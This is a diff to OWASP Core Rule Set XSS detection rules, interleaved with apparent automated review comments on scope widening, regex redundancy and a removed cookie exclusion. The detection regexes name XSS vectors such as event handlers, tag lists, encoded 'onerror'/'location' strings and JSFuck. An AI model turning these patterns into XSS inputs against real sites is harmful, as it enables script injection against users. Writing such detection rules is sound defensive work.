@@ -107,7 +107,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA # http://xssplayground.net23.net/xssfilter.html # script tag based XSS vectors, e.g., # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ "id:941110,\ phase:2,\ block,\ 
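Review bot: The 941110 target list changes from `REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer` to `REQUEST_HEADERS|!REQUEST_HEADERS:Cookie`, so every other request header, including `Authorization` and arbitrary custom headers, is now inspected by a PL1 rule; the Cookie exclusion sensibly avoids scoring the same bytes twice via `REQUEST_COOKIES`, but the widening is invisible in the rule comment above the hunk and should be stated there and in the changelog, with a note on the cost for requests carrying many large headers. The same target shape is used by the new 941120 in the later `-124,7 +124,45` hunk, so the explanation need only be written once and referenced from the other rule. The operator argument as shown here, `(?i)]*>[\s\S]*?`, has lost its tag tokens in this rendering, so the regex itself cannot be reviewed from this view.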
@@ -124,7 +124,45 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:U
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ XSS Filters - Category 2 ]=-
+# XSS vectors making use of event handlers like onerror, onload etc, e.g.,
+#
+# We are not listing all the known event handlers like rule 941160, but we
+# limit the alerts to keywords of 3-50 characters after the prefix ("on").
+#
+# The shortest known event is "onget". The longest known event is "onwebkitplaybacktargetavailabilitychanged"
+# with 39 chars after the prefix. 50 chars adds a little bit of safety.
+#
+# The regex requires the equals sign to be followed by a non-equals character (=[^=])
+# to prevent false positives with base64-encoded strings (which often end in = or ==).
+# This improvement allows the rule to be placed at PL1 despite having previously been
+# moved to PL2 in v3.4 due to base64-related false positives with the older regex.
+#
+SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,50}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \
+ "id:941120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\
+ msg:'XSS Filter - Category 2: Event Handler Vector',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-xss',\
+ tag:'xss-perf-disable',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'OWASP_CRS/ATTACK-XSS',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -155,7 +193,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -185,7 +223,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
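Review bot: The character classes in the 941120 operator carry redundant members: the leading class contains the byte `;` three times (`;`, `\x3B`, `\x3B`) and `\x09`/`\x0C` are already inside `\s`, and the trailing class repeats `\x3B`. The equivalent `[\s\"'`;/0-9=\x0B\x2C\x28]on[a-zA-Z]{3,50}[\s\x0B\x3B\x2C\x28]*?=[^=]` matches the same inputs — keep `\x0B`, since this file writes `[\s\x0b]` deliberately for PCRE builds whose `\s` excludes vertical tab, as the 933160 operator earlier in the diff shows. The `=[^=]` tail only addresses the base64 case described in the comment; because the leading class admits `/` and digits, ordinary tokens such as `;online=1` or `/ongoing=x` still match, so the test suite should carry a few such negative cases to record the accepted PL1 false-positive boundary. The `xss-perf-disable` tag and the `REQUEST_HEADERS|!REQUEST_HEADERS:Cookie` target are consistent with 941110 as changed earlier in this diff.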
@@ -219,7 +257,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -245,7 +283,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -273,7 +311,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -301,7 +339,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -324,7 +362,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -349,7 +387,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -372,7 +410,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -395,7 +433,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -418,7 +456,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -441,7 +479,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -464,7 +502,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -487,7 +525,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -510,7 +548,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -533,7 +571,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -556,7 +594,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -617,7 +655,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \
@@ -647,7 +685,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -678,7 +716,6 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 "id:941360,\
 phase:2,\
 block,\
- capture,\
 t:none,\
 msg:'JSFuck / Hieroglyphy obfuscation detected',\
 logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
@@ -690,7 +727,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242/63',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -707,7 +744,6 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx
 "id:941370,\
 phase:2,\
 block,\
- capture,\
 t:none,t:urlDecodeUni,t:compressWhitespace,\
 msg:'JavaScript global variable found',\
 logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
@@ -719,7 +755,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -753,7 +789,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -784,14 +820,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # 
@@ -816,42 +852,7 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ - severity:'CRITICAL',\ - setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" - - -# -# -=[ XSS Filters - Category 2 ]=- -# XSS vectors making use of event handlers like onerror, onload etc, e.g., -# -# We are not listing all the known event handlers like rule 941160, but we -# limit the alerts to keywords of 3-50 characters after the prefix ("on"). -# -# The shortest known event is "onget". The longest known event is "onwebkitplaybacktargetavailabilitychanged" -# with 39 chars after the prefix. 50 chars adds a little bit of safety. -# -# This rule has been moved to PL2 since it has a tendency to trigger on random input. -# -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,50}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \ - "id:941120,\ - phase:2,\ - block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ - msg:'XSS Filter - Category 2: Event Handler Vector',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-xss',\ - tag:'xss-perf-disable',\ - tag:'paranoia-level/2',\ - tag:'OWASP_CRS',\ - tag:'OWASP_CRS/ATTACK-XSS',\ - tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
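Review bot: Rule 941120 is deleted from PL2 here and re-added at PL1 in this file's first hunk (whose start lies outside this chunk), but the removed comment block was the only record of why it had been demoted ("tendency to trigger on random input") and nothing replaces that rationale. The regex of the new PL1 rule is byte-identical to the one removed here, while its target set grows from `REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer` to `REQUEST_HEADERS|!REQUEST_HEADERS:Cookie`, so at the default paranoia level it now inspects every request header except Cookie — a larger false-positive surface than the rule had before it was demoted. The new rule's header comment should say what makes PL1 acceptable again and call out the widened scope explicitly, e.g. `# Moved back to PL1 in 4.23.0; the target set now covers all request headers except Cookie, not only User-Agent/Referer.` A CHANGES entry naming 941120 would let operators who tuned around the PL2 placement re-check their exclusions.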
@@ -878,7 +879,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -907,7 +908,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -978,7 +979,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx <(?:a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx <(?:a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \ "id:941320,\ phase:2,\ block,\ 
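Review bot: The `!REQUEST_COOKIES:/_pk_ref/` target exclusion is dropped from 941320 here and, in the same way, from 941330, 941340 and 942380 in the hunks further down, yet none of those hunks records why the exclusion is no longer needed. `_pk_ref` is the Matomo/Piwik referrer cookie, which carries a URL and was presumably excluded because it tripped these rules; after this change it is inspected like any other cookie, so sites running that tracker may see new anomaly-score hits on these four rules. If the built-in exclusion was deliberately retired, a CHANGES entry and a one-line rule comment would let operators re-create it locally, e.g. `# The former built-in exclusion of REQUEST_COOKIES:/_pk_ref/ was removed in 4.23.0; use a ctl:ruleRemoveTargetById exclusion if that cookie causes false positives.`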
@@ -995,12 +996,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:[\"'][ ]*(?:[^a-z0-9~_:' ]|in).*?(?:(?:l|\x5cu006C)(?:o|\x5cu006F)(?:c|\x5cu0063)(?:a|\x5cu0061)(?:t|\x5cu0074)(?:i|\x5cu0069)(?:o|\x5cu006F)(?:n|\x5cu006E)|(?:n|\x5cu006E)(?:a|\x5cu0061)(?:m|\x5cu006D)(?:e|\x5cu0065)|(?:o|\x5cu006F)(?:n|\x5cu006E)(?:e|\x5cu0065)(?:r|\x5cu0072)(?:r|\x5cu0072)(?:o|\x5cu006F)(?:r|\x5cu0072)|(?:v|\x5cu0076)(?:a|\x5cu0061)(?:l|\x5cu006C)(?:u|\x5cu0075)(?:e|\x5cu0065)(?:O|\x5cu004F)(?:f|\x5cu0066)).*?=)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:[\"'][ ]*(?:[^a-z0-9~_:' ]|in).*?(?:(?:l|\x5cu006C)(?:o|\x5cu006F)(?:c|\x5cu0063)(?:a|\x5cu0061)(?:t|\x5cu0074)(?:i|\x5cu0069)(?:o|\x5cu006F)(?:n|\x5cu006E)|(?:n|\x5cu006E)(?:a|\x5cu0061)(?:m|\x5cu006D)(?:e|\x5cu0065)|(?:o|\x5cu006F)(?:n|\x5cu006E)(?:e|\x5cu0065)(?:r|\x5cu0072)(?:r|\x5cu0072)(?:o|\x5cu006F)(?:r|\x5cu0072)|(?:v|\x5cu0076)(?:a|\x5cu0061)(?:l|\x5cu006C)(?:u|\x5cu0075)(?:e|\x5cu0065)(?:O|\x5cu004F)(?:f|\x5cu0066)).*?=)" \ "id:941330,\ phase:2,\ block,\ @@ -1017,7 +1018,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1025,7 +1026,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA
 # This rule is also triggered by the following exploit(s):
 # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\"\'][ ]*(?:[^a-z0-9~_:\' ]|in).+?[.].+?=" \
+SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\"\'][ ]*(?:[^a-z0-9~_:\' ]|in).+?[.].+?=" \
 "id:941340,\
 phase:2,\
 block,\
@@ -1042,7 +1043,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-XSS',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
